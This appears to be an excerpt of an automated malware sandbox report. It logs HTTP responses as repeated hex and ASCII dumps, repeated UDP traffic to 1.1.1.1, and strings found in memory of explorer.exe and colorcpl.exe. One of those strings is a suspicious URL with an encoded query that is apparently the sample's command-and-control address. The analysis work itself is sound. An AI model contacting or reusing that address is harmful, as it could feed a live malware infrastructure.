2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 21 Nov 2023 02:31:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4515Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Tue, 21 Nov 2023 02:32:05 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=omfUeHiTJDD66dyoVCutoz78sBmapGqz6PKgBdHu9APnwo3knvupiE7ld9pTsOUedJlsNBBhoOTOMWVza6nc%2BSxHBsSlUuBzL1uvM64LV6s3C2EW61SgSFxubYt7rgze46OTtmZE"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=6.999969Server: cloudflareCF-RAY: 829584cbb99b0658-IADalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofo
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcache-control: private, no-cache, max-age=0pragma: no-cachecontent-length: 1236date: Tue, 21 Nov 2023 02:32:02 GMTserver: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 21 Nov 2023 02:32:47 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4515Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Tue, 21 Nov 2023 02:33:02 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=w0Q2pTZmb8uR3ituotWcihVxyPQrSYnZIY93E3ajzRG67Kyly0iJn1NeYllgOaoyveTmmmo6vEHy0saGUSqpvK3tGGiMXqOvgolY4gdNrN5eL75KIF7l9k0xJAxsZzo1R1lJ5twk"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=10.999918Server: cloudflareCF-RAY: 82958633cd4657c4-IADalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofol
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 21 Nov 2023 02:33:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4515Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Tue, 21 Nov 2023 02:33:34 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E4DAWwtzAvJlPfepUXf0REHpRpg1KZxNlQmTEEg912%2B85hBib4Ig2ueyhZIBo3IBp0csP1An1oKj3iUwMIIIyL4ssmB931pkQ0tCLGYp4vFTBSg1TJIfhKEbnPR4ir3dLegP8gN3"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=15.000105Server: cloudflareCF-RAY: 829586f64f218287-IADalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nof
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcache-control: private, no-cache, max-age=0pragma: no-cachecontent-length: 1236date: Tue, 21 Nov 2023 02:33:29 GMTserver: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: explorer.exe, 00000003.00000002.4453052192.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4453052192.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000003.00000000.2001871398.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4448974063.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: explorer.exe, 00000003.00000002.4453052192.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4453052192.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000003.00000002.4453052192.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4453052192.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000003.00000002.4456836117.0000000011332000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4450315499.00000000054F2000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://lacroixundkress.de/jskg/?yV3lvHf=rveZUXr0eiAxnxziI1jk8UfOJjaXPdODc7FyD8YkXp0tAnYlEmHCL6gZaE21
Source: explorer.exe, 00000003.00000002.4453052192.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4453052192.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000003.00000002.4453052192.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
